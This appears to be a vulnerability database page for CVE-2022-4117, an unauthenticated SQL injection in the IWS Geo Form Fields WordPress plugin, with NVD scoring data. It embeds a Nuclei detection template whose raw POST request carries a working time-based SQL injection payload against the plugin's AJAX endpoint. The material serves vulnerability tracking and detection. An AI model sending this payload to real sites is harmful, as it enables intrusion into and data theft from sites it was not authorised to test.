Description
The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
Affected Software
Related
{"id": "PRION:CVE-2022-4117", "vendorId": null, "type": "prion", "bulletinFamily": "NVD", "title": "Sql injection", "description": "The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.", "published": "2022-12-26T13:15:00", "modified": "2023-01-04T21:30:00", "epss": [{"cve": "CVE-2022-4117", "epss": 0.04023, "percentile": 0.91123, "modified": "2023-11-20"}], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}}, "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-4117", "reporter": "PRIOn knowledge base", "references": ["https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193"], "cvelist": ["CVE-2022-4117"], "immutableFields": [], "lastseen": "2023-11-20T23:51:04", "viewCount": 5, "enchantments": {"score": {"value": 9.8, "uncertanity": 0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-4117"]}, {"type": "nuclei", "idList": ["NUCLEI:CVE-2022-4117"]}]}, "vulnersScore": 9.8}, "_state": {"score": 1700524477, "dependencies": 1700524371}, "_internal": {"score_hash": "b49ceb98f58f7dbd9c838090a8ebb242"}, "affectedSoftware": [{"version": "1.0", "operator": "le", "name": "iws-geo-form-fields"}], "vendor_cvss2": {"score": "7.5", "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vendor_cvss3": {}}
{"cve": [{"lastseen": "2023-12-06T16:31:21", "description": "The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-26T13:15:00", "type": "cve", "title": "CVE-2022-4117", "cwe": [], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4117"], "modified": "2023-11-07T03:56:00", "cpe": ["cpe:/a:iws-geo-form-fields_project:iws-geo-form-fields:1.0"], "id": "CVE-2022-4117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:1.0:*:*:*:*:wordpress:*:*"]}], "nuclei": [{"lastseen": "2023-12-06T22:44:09", "description": "\n WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-18T00:00:00", "type": "nuclei", "title": "WordPress IWS Geo Form Fields <=1.0 - SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4117"], "modified": "2023-12-06T00:00:00", "id": "NUCLEI:CVE-2022-4117", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2022/CVE-2022-4117.yaml", "sourceData": "id: CVE-2022-4117\n\ninfo:\n name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1fac3eb4-13c0-442d-b27c-7b7736208193\n - https://wordpress.org/plugins/iws-geo-form-fields/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4117\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4117\n cwe-id: CWE-89\n epss-score: 0.03393\n epss-percentile: 0.90397\n cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: iws-geo-form-fields_project\n product: iws-geo-form-fields\n framework: wordpress\n tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,iws-geo-form-fields,wpscan,iws-geo-form-fields_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")'\n condition: and\n# digest: 4a0a00473045022100c768267cd077c5215d15b4b86b1614e9bebdec9d8a439dbdcda19b3b81d0f90c0220645ca6745dcf3733d61dce62510c538ac9b80fb5111a26315e8d65a1a1153ebd:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
Sql injection
